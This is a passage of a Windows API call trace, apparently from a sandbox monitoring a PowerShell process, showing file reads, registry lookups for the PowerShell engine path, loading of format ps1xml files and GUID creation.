	[0692.303] ReadFile (in: hFile=0x304, lpBuffer=0x2ccfef8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2ccfef8*, lpNumberOfBytesRead=0x26d488*=0x1000, lpOverlapped=0x0) returned 1
	[0692.305] ReadFile (in: hFile=0x304, lpBuffer=0x2ccfef8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2ccfef8*, lpNumberOfBytesRead=0x26d488*=0x1000, lpOverlapped=0x0) returned 1
	[0692.306] ReadFile (in: hFile=0x304, lpBuffer=0x2ccfef8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2ccfef8*, lpNumberOfBytesRead=0x26d488*=0x1000, lpOverlapped=0x0) returned 1
	[0692.306] ReadFile (in: hFile=0x304, lpBuffer=0x2ccfef8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2ccfef8*, lpNumberOfBytesRead=0x26d488*=0x1000, lpOverlapped=0x0) returned 1
	[0692.306] ReadFile (in: hFile=0x304, lpBuffer=0x2ccfef8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2ccfef8*, lpNumberOfBytesRead=0x26d488*=0x1000, lpOverlapped=0x0) returned 1
	[0692.307] ReadFile (in: hFile=0x304, lpBuffer=0x2ccfef8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2ccfef8*, lpNumberOfBytesRead=0x26d488*=0x1000, lpOverlapped=0x0) returned 1
	[0692.307] ReadFile (in: hFile=0x304, lpBuffer=0x2ccfef8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2ccfef8*, lpNumberOfBytesRead=0x26d488*=0x1000, lpOverlapped=0x0) returned 1
	[0692.307] ReadFile (in: hFile=0x304, lpBuffer=0x2ccfef8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2ccfef8*, lpNumberOfBytesRead=0x26d488*=0x1000, lpOverlapped=0x0) returned 1
	[0692.308] ReadFile (in: hFile=0x304, lpBuffer=0x2ccfef8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2ccfef8*, lpNumberOfBytesRead=0x26d488*=0x1000, lpOverlapped=0x0) returned 1
	[0692.308] ReadFile (in: hFile=0x304, lpBuffer=0x2ccfef8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2ccfef8*, lpNumberOfBytesRead=0x26d488*=0x1000, lpOverlapped=0x0) returned 1
	[0692.308] ReadFile (in: hFile=0x304, lpBuffer=0x2ccfef8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2ccfef8*, lpNumberOfBytesRead=0x26d488*=0x1000, lpOverlapped=0x0) returned 1
	[0692.309] ReadFile (in: hFile=0x304, lpBuffer=0x2ccfef8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2ccfef8*, lpNumberOfBytesRead=0x26d488*=0x1000, lpOverlapped=0x0) returned 1
	[0692.309] ReadFile (in: hFile=0x304, lpBuffer=0x2ccfef8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2ccfef8*, lpNumberOfBytesRead=0x26d488*=0x1000, lpOverlapped=0x0) returned 1
	[0692.309] ReadFile (in: hFile=0x304, lpBuffer=0x2ccfef8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2ccfef8*, lpNumberOfBytesRead=0x26d488*=0x1000, lpOverlapped=0x0) returned 1
	[0692.310] ReadFile (in: hFile=0x304, lpBuffer=0x2ccfef8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2ccfef8*, lpNumberOfBytesRead=0x26d488*=0x1000, lpOverlapped=0x0) returned 1
	[0692.310] ReadFile (in: hFile=0x304, lpBuffer=0x2ccfef8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2ccfef8*, lpNumberOfBytesRead=0x26d488*=0x1000, lpOverlapped=0x0) returned 1
	[0692.310] ReadFile (in: hFile=0x304, lpBuffer=0x2ccfef8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2ccfef8*, lpNumberOfBytesRead=0x26d488*=0x1000, lpOverlapped=0x0) returned 1
	[0692.315] ReadFile (in: hFile=0x304, lpBuffer=0x2ccfef8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2ccfef8*, lpNumberOfBytesRead=0x26d488*=0x1000, lpOverlapped=0x0) returned 1
	[0692.315] ReadFile (in: hFile=0x304, lpBuffer=0x2ccfef8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2ccfef8*, lpNumberOfBytesRead=0x26d488*=0x1000, lpOverlapped=0x0) returned 1
	[0692.316] ReadFile (in: hFile=0x304, lpBuffer=0x2ccfef8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2ccfef8*, lpNumberOfBytesRead=0x26d488*=0x1000, lpOverlapped=0x0) returned 1
	[0692.316] ReadFile (in: hFile=0x304, lpBuffer=0x2ccfef8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2ccfef8*, lpNumberOfBytesRead=0x26d488*=0x1000, lpOverlapped=0x0) returned 1
	[0692.316] ReadFile (in: hFile=0x304, lpBuffer=0x2ccfef8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2ccfef8*, lpNumberOfBytesRead=0x26d488*=0x1000, lpOverlapped=0x0) returned 1
	[0692.317] ReadFile (in: hFile=0x304, lpBuffer=0x2ccfef8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2ccfef8*, lpNumberOfBytesRead=0x26d488*=0x1000, lpOverlapped=0x0) returned 1
	[0692.317] ReadFile (in: hFile=0x304, lpBuffer=0x2ccfef8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2ccfef8*, lpNumberOfBytesRead=0x26d488*=0x1000, lpOverlapped=0x0) returned 1
	[0692.317] ReadFile (in: hFile=0x304, lpBuffer=0x2ccfef8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2ccfef8*, lpNumberOfBytesRead=0x26d488*=0x1000, lpOverlapped=0x0) returned 1
	[0692.318] ReadFile (in: hFile=0x304, lpBuffer=0x2ccfef8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2ccfef8*, lpNumberOfBytesRead=0x26d488*=0x1b4, lpOverlapped=0x0) returned 1
	[0692.318] ReadFile (in: hFile=0x304, lpBuffer=0x2ccfef8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d488, lpOverlapped=0x0 | out: lpBuffer=0x2ccfef8*, lpNumberOfBytesRead=0x26d488*=0x0, lpOverlapped=0x0) returned 1
	[0692.318] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d4e8 | out: phkResult=0x26d4e8*=0x304) returned 0x0
	[0692.318] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d46c, lpData=0x0, lpcbData=0x26d468*=0x0 | out: lpType=0x26d46c*=0x1, lpData=0x0, lpcbData=0x26d468*=0x56) returned 0x0
	[0692.318] CoTaskMemAlloc (cb=0x5a) returned 0x1b890150
	[0692.318] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d43c, lpData=0x1b890150, lpcbData=0x26d438*=0x56 | out: lpType=0x26d43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d438*=0x56) returned 0x0
	[0692.319] CoTaskMemFree (pv=0x1b890150) 
	[0692.319] RegCloseKey (hKey=0x304) returned 0x0
	[0692.319] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x26d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0692.319] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0704.739] VirtualQuery (in: lpAddress=0x26c1d0, lpBuffer=0x26d090, dwLength=0x30 | out: lpBuffer=0x26d090*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0704.752] VirtualQuery (in: lpAddress=0x26c1d0, lpBuffer=0x26d090, dwLength=0x30 | out: lpBuffer=0x26d090*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0710.311] CoTaskMemAlloc (cb=0x104) returned 0x444820
	[0710.311] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0710.311] CoTaskMemFree (pv=0x444820) 
	[0713.253] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d688 | out: phkResult=0x26d688*=0x308) returned 0x0
	[0713.253] RegQueryValueExW (in: hKey=0x308, lpValueName="path", lpReserved=0x0, lpType=0x26d69c, lpData=0x0, lpcbData=0x26d698*=0x0 | out: lpType=0x26d69c*=0x1, lpData=0x0, lpcbData=0x26d698*=0x74) returned 0x0
	[0713.253] RegQueryValueExW (in: hKey=0x308, lpValueName="path", lpReserved=0x0, lpType=0x26d60c, lpData=0x0, lpcbData=0x26d608*=0x0 | out: lpType=0x26d60c*=0x1, lpData=0x0, lpcbData=0x26d608*=0x74) returned 0x0
	[0713.253] CoTaskMemAlloc (cb=0x78) returned 0x3f2020
	[0713.254] RegQueryValueExW (in: hKey=0x308, lpValueName="path", lpReserved=0x0, lpType=0x26d5dc, lpData=0x3f2020, lpcbData=0x26d5d8*=0x74 | out: lpType=0x26d5dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x26d5d8*=0x74) returned 0x0
	[0713.254] CoTaskMemFree (pv=0x3f2020) 
	[0713.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x26d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0713.254] SetErrorMode (uMode=0x1) returned 0x1
	[0713.254] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x26d560 | out: lpFileInformation=0x26d560*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0713.254] SetErrorMode (uMode=0x1) returned 0x1
	[0713.255] CoTaskMemAlloc (cb=0x104) returned 0x444820
	[0713.255] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0713.255] CoTaskMemFree (pv=0x444820) 
	[0713.258] CoTaskMemAlloc (cb=0x104) returned 0x444820
	[0713.258] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0713.258] CoTaskMemFree (pv=0x444820) 
	[0713.258] CoTaskMemAlloc (cb=0x104) returned 0x444820
	[0713.258] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0713.258] CoTaskMemFree (pv=0x444820) 
	[0713.259] CoTaskMemAlloc (cb=0x104) returned 0x444820
	[0713.259] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0713.259] CoTaskMemFree (pv=0x444820) 
	[0713.259] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e8
	[0713.259] GetFileType (hFile=0x2e8) returned 0x1
	[0713.260] SetErrorMode (uMode=0x1) returned 0x1
	[0713.260] GetFileType (hFile=0x2e8) returned 0x1
	[0713.260] ReadFile (in: hFile=0x2e8, lpBuffer=0x32298a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x32298a0*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0713.261] ReadFile (in: hFile=0x2e8, lpBuffer=0x32298a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x32298a0*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0713.262] ReadFile (in: hFile=0x2e8, lpBuffer=0x32298a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x32298a0*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0713.262] ReadFile (in: hFile=0x2e8, lpBuffer=0x32298a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x32298a0*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0713.263] ReadFile (in: hFile=0x2e8, lpBuffer=0x32298a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x32298a0*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0713.263] ReadFile (in: hFile=0x2e8, lpBuffer=0x32298a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x32298a0*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0713.264] ReadFile (in: hFile=0x2e8, lpBuffer=0x32298a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x32298a0*, lpNumberOfBytesRead=0x26d1f8*=0x9e2, lpOverlapped=0x0) returned 1
	[0713.264] ReadFile (in: hFile=0x2e8, lpBuffer=0x3228dea, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3228dea*, lpNumberOfBytesRead=0x26d1f8*=0x0, lpOverlapped=0x0) returned 1
	[0713.264] ReadFile (in: hFile=0x2e8, lpBuffer=0x32298a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x32298a0*, lpNumberOfBytesRead=0x26d1f8*=0x0, lpOverlapped=0x0) returned 1
	[0713.264] CloseHandle (hObject=0x2e8) returned 1
	[0713.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0713.264] SetErrorMode (uMode=0x1) returned 0x1
	[0713.264] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d1a0 | out: lpFileInformation=0x26d1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0713.265] SetErrorMode (uMode=0x1) returned 0x1
	[0713.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0713.265] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d288 | out: phkResult=0x26d288*=0x2e8) returned 0x0
	[0713.265] RegQueryValueExW (in: hKey=0x2e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d20c, lpData=0x0, lpcbData=0x26d208*=0x0 | out: lpType=0x26d20c*=0x1, lpData=0x0, lpcbData=0x26d208*=0x56) returned 0x0
	[0713.265] CoTaskMemAlloc (cb=0x5a) returned 0x1b890150
	[0713.265] RegQueryValueExW (in: hKey=0x2e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d1dc, lpData=0x1b890150, lpcbData=0x26d1d8*=0x56 | out: lpType=0x26d1dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d1d8*=0x56) returned 0x0
	[0713.265] CoTaskMemFree (pv=0x1b890150) 
	[0713.265] RegCloseKey (hKey=0x2e8) returned 0x0
	[0713.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0713.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0715.749] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xb30a6d57, Data2=0x53b7, Data3=0x4300, Data4=([0]=0x89, [1]=0x36, [2]=0x88, [3]=0x2a, [4]=0x78, [5]=0xf0, [6]=0xba, [7]=0x23))) returned 0x0
	[0715.758] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xdc8c6d22, Data2=0xc663, Data3=0x478a, Data4=([0]=0xb1, [1]=0x98, [2]=0x16, [3]=0x93, [4]=0x48, [5]=0xd8, [6]=0xcc, [7]=0xa))) returned 0x0
	[0715.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0715.761] SetErrorMode (uMode=0x1) returned 0x1
	[0715.762] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e8
	[0715.762] GetFileType (hFile=0x2e8) returned 0x1
	[0715.762] SetErrorMode (uMode=0x1) returned 0x1
	[0715.762] GetFileType (hFile=0x2e8) returned 0x1
	[0715.764] ReadFile (in: hFile=0x2e8, lpBuffer=0x3254408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3254408*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0716.694] ReadFile (in: hFile=0x2e8, lpBuffer=0x3254408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3254408*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0716.695] ReadFile (in: hFile=0x2e8, lpBuffer=0x3254408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3254408*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0716.696] ReadFile (in: hFile=0x2e8, lpBuffer=0x3254408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3254408*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0716.696] ReadFile (in: hFile=0x2e8, lpBuffer=0x3254408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3254408*, lpNumberOfBytesRead=0x26d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0716.698] ReadFile (in: hFile=0x2e8, lpBuffer=0x3254408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3254408*, lpNumberOfBytesRead=0x26d1f8*=0xfb2, lpOverlapped=0x0) returned 1
	[0716.698] ReadFile (in: hFile=0x2e8, lpBuffer=0x3253b22, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3253b22*, lpNumberOfBytesRead=0x26d1f8*=0x0, lpOverlapped=0x0) returned 1
	[0716.698] ReadFile (in: hFile=0x2e8, lpBuffer=0x3254408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3254408*, lpNumberOfBytesRead=0x26d1f8*=0x0, lpOverlapped=0x0) returned 1
	[0716.698] CloseHandle (hObject=0x2e8) returned 1
	[0716.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0716.698] SetErrorMode (uMode=0x1) returned 0x1
	[0716.698] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d1a0 | out: lpFileInformation=0x26d1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0716.699] SetErrorMode (uMode=0x1) returned 0x1
	[0716.699] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0716.699] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d288 | out: phkResult=0x26d288*=0x2e8) returned 0x0
	[0716.699] RegQueryValueExW (in: hKey=0x2e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d20c, lpData=0x0, lpcbData=0x26d208*=0x0 | out: lpType=0x26d20c*=0x1, lpData=0x0, lpcbData=0x26d208*=0x56) returned 0x0
	[0716.699] CoTaskMemAlloc (cb=0x5a) returned 0x1b8900e0
	[0716.699] RegQueryValueExW (in: hKey=0x2e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d1dc, lpData=0x1b8900e0, lpcbData=0x26d1d8*=0x56 | out: lpType=0x26d1dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d1d8*=0x56) returned 0x0
	[0716.699] CoTaskMemFree (pv=0x1b8900e0) 
	[0716.699] RegCloseKey (hKey=0x2e8) returned 0x0
	[0716.699] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0716.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0716.702] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xcd82fdad, Data2=0xe8f4, Data3=0x46ef, Data4=([0]=0xbe, [1]=0x29, [2]=0xda, [3]=0xf, [4]=0x1f, [5]=0x51, [6]=0xe5, [7]=0xdd))) returned 0x0
	[0716.707] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x3da079fe, Data2=0xc825, Data3=0x46e6, Data4=([0]=0xac, [1]=0xb, [2]=0xc0, [3]=0xd0, [4]=0x76, [5]=0xe5, [6]=0xc7, [7]=0xce))) returned 0x0
	[0716.709] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0xe18eefc9, Data2=0xfc, Data3=0x457a, Data4=([0]=0x96, [1]=0x3d, [2]=0x65, [3]=0xbb, [4]=0x5f, [5]=0xac, [6]=0x7, [7]=0x38))) returned 0x0
	[0716.710] CoCreateGuid (in: pguid=0x26d4b0 | out: pguid=0x26d4b0*(Data1=0x95a23934, Data2=0x5721, Data3=0x42e3, Data4=([0]=0xb9, [1]=0x6e, [2]=0xe9, [3]=0x69, [4]=0x54, [5]=0x16, [6]=0x4c, [7]=0x6))) returned 0x0
